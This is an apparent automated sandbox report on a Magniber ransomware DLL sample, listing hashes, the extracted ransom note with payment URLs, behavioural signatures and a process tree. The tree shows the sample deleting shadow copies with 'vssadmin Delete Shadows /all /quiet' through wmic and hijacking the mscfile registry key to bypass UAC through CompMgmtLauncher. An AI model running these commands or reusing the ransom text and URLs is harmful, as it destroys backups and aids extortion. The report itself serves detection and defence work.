magniber | 064998d1e0e34525fd5a5d4dd384adc77ba752ee2256e1d0d2bdbb197a64de9c

Analysis

max time kernel
121s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
08-01-2025 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_a2478cf8d1c823fb8ccf323692b23121.dll
Size

38KB
MD5

a2478cf8d1c823fb8ccf323692b23121
SHA1

088017b775533223ce21686de37f351337e43401
SHA256

064998d1e0e34525fd5a5d4dd384adc77ba752ee2256e1d0d2bdbb197a64de9c
SHA512

6082f709957d9fd026d4fff7a98dc77b4a337986f5754899f641165316d36eae4060c92f7122b813ea89aa1ad527cb55debe01e55621eba8b5d4f574ffb56ff7
SSDEEP

768:BsLGs0M9c39PH14ax7Gmaz6XDYHMeyyvXKGz6NfS3/UYuGjo4g7VpMm8Wl:BsLGs0AcRH1hx7GmazMDbeNfKGz6NK3c

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://c4302668ba001c1034wajxnjkw.r4vwwgioac7x2ftfglttr7qst265edv6rhmsdmjdgt6wxzuhgx4ynfid.onion/wajxnjkw Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://c4302668ba001c1034wajxnjkw.lessmod.quest/wajxnjkw http://c4302668ba001c1034wajxnjkw.fixkeys.top/wajxnjkw http://c4302668ba001c1034wajxnjkw.phoneis.website/wajxnjkw http://c4302668ba001c1034wajxnjkw.donehim.space/wajxnjkw Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://c4302668ba001c1034wajxnjkw.r4vwwgioac7x2ftfglttr7qst265edv6rhmsdmjdgt6wxzuhgx4ynfid.onion/wajxnjkw

http://c4302668ba001c1034wajxnjkw.lessmod.quest/wajxnjkw

http://c4302668ba001c1034wajxnjkw.fixkeys.top/wajxnjkw

http://c4302668ba001c1034wajxnjkw.phoneis.website/wajxnjkw

http://c4302668ba001c1034wajxnjkw.donehim.space/wajxnjkw

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral1/memory/2768-2-0x0000000001C50000-0x0000000002574000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Magniber family
magniber

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	944	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	572	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	944	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	200	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2072	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	944	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	112	944	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2360	944	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	896	944	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	944	vssadmin.exe	40

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (82) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2768 set thread context of 1084	2768	rundll32.exe	18
PID 2768 set thread context of 1156	2768	rundll32.exe	20
PID 2768 set thread context of 1180	2768	rundll32.exe	21
PID 2768 set thread context of 952	2768	rundll32.exe	25

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 10 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2340	vssadmin.exe
200	vssadmin.exe
2752	vssadmin.exe
2068	vssadmin.exe
2072	vssadmin.exe
1588	vssadmin.exe
2360	vssadmin.exe
1788	vssadmin.exe
580	vssadmin.exe
572	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006419aae396217b4a839ffbb12318367100000000020000000000106600000001000020000000858f96a9077fa5c6b2848a602491a8252d1465ad424d656189d0979c6b701582000000000e8000000002000020000000682bd842af1335f3557bb588e2c89c234ef4de4e4de086300fade0df49a962282000000036d9af69c2f9025521b835aa9170336b10ef206b67908873bb3e002de194919b400000002cf9fde333dcf3beb0c07669556873c3ec4f745516c3917b75db0c925af39a31b0f8685e0a9931193d22e8d2699a6cd9c1253fa8ecc6417265b4ba5dfa9a2a6c	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "442505359"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CC19C111-CDC5-11EF-BD8C-6252F262FB8A} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0f538a2d261db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006419aae396217b4a839ffbb12318367100000000020000000000106600000001000020000000aa261a720e2450e3d9cadb673fffb0a244cce6bd398ad3d185263f183584fb10000000000e8000000002000020000000e6294ee493a83b5e38ac78b5b2a61887ba73f876cc907efdacb48acba85d303e9000000058fd008154a219496d66b72cd25ebea6a380676304a05b16510bc6f0782ad3561b3cc87f5c00e02dcb8218cb1cd5acb1b654891fc952ce7bda896af48b27b9224b38d8dd377fe34616a5497f45265e6107113c8dd840e09cbc19c6c74c9f31551c1f15c6758784474194a48d00c5cba96bc8ea6c23afa24a41714d493f909b5a0b73390840a1096d8ed55117dc21d3794000000005fe3b38783f0bda7ac5ace716aca79ea678eba2d85cd1e09efd639fd5d81de39b9e8a9c1f803e4cefc6be6bfa57591c1628a3a70a46471af29e2ff5fe812b6e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2528	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2768	rundll32.exe
2768	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2768	rundll32.exe
2768	rundll32.exe
2768	rundll32.exe
2768	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2936	WMIC.exe
Token: SeSecurityPrivilege	2936	WMIC.exe
Token: SeTakeOwnershipPrivilege	2936	WMIC.exe
Token: SeLoadDriverPrivilege	2936	WMIC.exe
Token: SeSystemProfilePrivilege	2936	WMIC.exe
Token: SeSystemtimePrivilege	2936	WMIC.exe
Token: SeProfSingleProcessPrivilege	2936	WMIC.exe
Token: SeIncBasePriorityPrivilege	2936	WMIC.exe
Token: SeCreatePagefilePrivilege	2936	WMIC.exe
Token: SeBackupPrivilege	2936	WMIC.exe
Token: SeRestorePrivilege	2936	WMIC.exe
Token: SeShutdownPrivilege	2936	WMIC.exe
Token: SeDebugPrivilege	2936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2936	WMIC.exe
Token: SeRemoteShutdownPrivilege	2936	WMIC.exe
Token: SeUndockPrivilege	2936	WMIC.exe
Token: SeManageVolumePrivilege	2936	WMIC.exe
Token: 33	2936	WMIC.exe
Token: 34	2936	WMIC.exe
Token: 35	2936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2936	WMIC.exe
Token: SeSecurityPrivilege	2936	WMIC.exe
Token: SeTakeOwnershipPrivilege	2936	WMIC.exe
Token: SeLoadDriverPrivilege	2936	WMIC.exe
Token: SeSystemProfilePrivilege	2936	WMIC.exe
Token: SeSystemtimePrivilege	2936	WMIC.exe
Token: SeProfSingleProcessPrivilege	2936	WMIC.exe
Token: SeIncBasePriorityPrivilege	2936	WMIC.exe
Token: SeCreatePagefilePrivilege	2936	WMIC.exe
Token: SeBackupPrivilege	2936	WMIC.exe
Token: SeRestorePrivilege	2936	WMIC.exe
Token: SeShutdownPrivilege	2936	WMIC.exe
Token: SeDebugPrivilege	2936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2936	WMIC.exe
Token: SeRemoteShutdownPrivilege	2936	WMIC.exe
Token: SeUndockPrivilege	2936	WMIC.exe
Token: SeManageVolumePrivilege	2936	WMIC.exe
Token: 33	2936	WMIC.exe
Token: 34	2936	WMIC.exe
Token: 35	2936	WMIC.exe
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeBackupPrivilege	3000	vssvc.exe
Token: SeRestorePrivilege	3000	vssvc.exe
Token: SeAuditPrivilege	3000	vssvc.exe
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2320	wmic.exe
Token: SeSecurityPrivilege	2320	wmic.exe
Token: SeTakeOwnershipPrivilege	2320	wmic.exe
Token: SeLoadDriverPrivilege	2320	wmic.exe
Token: SeSystemProfilePrivilege	2320	wmic.exe
Token: SeSystemtimePrivilege	2320	wmic.exe
Token: SeProfSingleProcessPrivilege	2320	wmic.exe
Token: SeIncBasePriorityPrivilege	2320	wmic.exe
Token: SeCreatePagefilePrivilege	2320	wmic.exe
Token: SeBackupPrivilege	2320	wmic.exe
Token: SeRestorePrivilege	2320	wmic.exe
Token: SeShutdownPrivilege	2320	wmic.exe
Token: SeDebugPrivilege	2320	wmic.exe
Token: SeSystemEnvironmentPrivilege	2320	wmic.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1900	iexplore.exe
1180	Explorer.EXE
1180	Explorer.EXE
1180	Explorer.EXE
1180	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1180	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1900	iexplore.exe
1900	iexplore.exe
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
1180	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1156 wrote to memory of 2528	1156	Dwm.exe	31
PID 1156 wrote to memory of 2528	1156	Dwm.exe	31
PID 1156 wrote to memory of 2528	1156	Dwm.exe	31
PID 1156 wrote to memory of 2532	1156	Dwm.exe	32
PID 1156 wrote to memory of 2532	1156	Dwm.exe	32
PID 1156 wrote to memory of 2532	1156	Dwm.exe	32
PID 1156 wrote to memory of 2604	1156	Dwm.exe	33
PID 1156 wrote to memory of 2604	1156	Dwm.exe	33
PID 1156 wrote to memory of 2604	1156	Dwm.exe	33
PID 1156 wrote to memory of 1508	1156	Dwm.exe	34
PID 1156 wrote to memory of 1508	1156	Dwm.exe	34
PID 1156 wrote to memory of 1508	1156	Dwm.exe	34
PID 1508 wrote to memory of 2936	1508	cmd.exe	38
PID 1508 wrote to memory of 2936	1508	cmd.exe	38
PID 1508 wrote to memory of 2936	1508	cmd.exe	38
PID 2532 wrote to memory of 1900	2532	cmd.exe	39
PID 2532 wrote to memory of 1900	2532	cmd.exe	39
PID 2532 wrote to memory of 1900	2532	cmd.exe	39
PID 1900 wrote to memory of 2612	1900	iexplore.exe	45
PID 1900 wrote to memory of 2612	1900	iexplore.exe	45
PID 1900 wrote to memory of 2612	1900	iexplore.exe	45
PID 1900 wrote to memory of 2612	1900	iexplore.exe	45
PID 2332 wrote to memory of 3068	2332	cmd.exe	46
PID 2332 wrote to memory of 3068	2332	cmd.exe	46
PID 2332 wrote to memory of 3068	2332	cmd.exe	46
PID 3068 wrote to memory of 2320	3068	CompMgmtLauncher.exe	49
PID 3068 wrote to memory of 2320	3068	CompMgmtLauncher.exe	49
PID 3068 wrote to memory of 2320	3068	CompMgmtLauncher.exe	49
PID 952 wrote to memory of 2404	952	DllHost.exe	54
PID 952 wrote to memory of 2404	952	DllHost.exe	54
PID 952 wrote to memory of 2404	952	DllHost.exe	54
PID 952 wrote to memory of 320	952	DllHost.exe	55
PID 952 wrote to memory of 320	952	DllHost.exe	55
PID 952 wrote to memory of 320	952	DllHost.exe	55
PID 320 wrote to memory of 524	320	cmd.exe	58
PID 320 wrote to memory of 524	320	cmd.exe	58
PID 320 wrote to memory of 524	320	cmd.exe	58
PID 2340 wrote to memory of 1796	2340	cmd.exe	63
PID 2340 wrote to memory of 1796	2340	cmd.exe	63
PID 2340 wrote to memory of 1796	2340	cmd.exe	63
PID 1796 wrote to memory of 2520	1796	CompMgmtLauncher.exe	64
PID 1796 wrote to memory of 2520	1796	CompMgmtLauncher.exe	64
PID 1796 wrote to memory of 2520	1796	CompMgmtLauncher.exe	64
PID 1084 wrote to memory of 1652	1084	taskhost.exe	68
PID 1084 wrote to memory of 1652	1084	taskhost.exe	68
PID 1084 wrote to memory of 1652	1084	taskhost.exe	68
PID 1084 wrote to memory of 1848	1084	taskhost.exe	69
PID 1084 wrote to memory of 1848	1084	taskhost.exe	69
PID 1084 wrote to memory of 1848	1084	taskhost.exe	69
PID 1848 wrote to memory of 888	1848	cmd.exe	72
PID 1848 wrote to memory of 888	1848	cmd.exe	72
PID 1848 wrote to memory of 888	1848	cmd.exe	72
PID 1480 wrote to memory of 2236	1480	cmd.exe	77
PID 1480 wrote to memory of 2236	1480	cmd.exe	77
PID 1480 wrote to memory of 2236	1480	cmd.exe	77
PID 2236 wrote to memory of 236	2236	CompMgmtLauncher.exe	78
PID 2236 wrote to memory of 236	2236	CompMgmtLauncher.exe	78
PID 2236 wrote to memory of 236	2236	CompMgmtLauncher.exe	78
PID 2768 wrote to memory of 2884	2768	rundll32.exe	82
PID 2768 wrote to memory of 2884	2768	rundll32.exe	82
PID 2768 wrote to memory of 2884	2768	rundll32.exe	82
PID 2768 wrote to memory of 2676	2768	rundll32.exe	84
PID 2768 wrote to memory of 2676	2768	rundll32.exe	84
PID 2768 wrote to memory of 2676	2768	rundll32.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1652
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:888

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2528
- C:\Windows\system32\cmd.exe
  cmd /c "start http://c4302668ba001c1034wajxnjkw.lessmod.quest/wajxnjkw^&2^&37235816^&83^&351^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://c4302668ba001c1034wajxnjkw.lessmod.quest/wajxnjkw&2&37235816&83&351&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2612
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2604
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2936

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
PID:1180
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_a2478cf8d1c823fb8ccf323692b23121.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2884
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    PID:2676
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:2708
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:948
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:3020
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2312

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:952
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2404
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:524

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1788

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2320

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:580

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:572

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\system32\wbem\wmic.exe
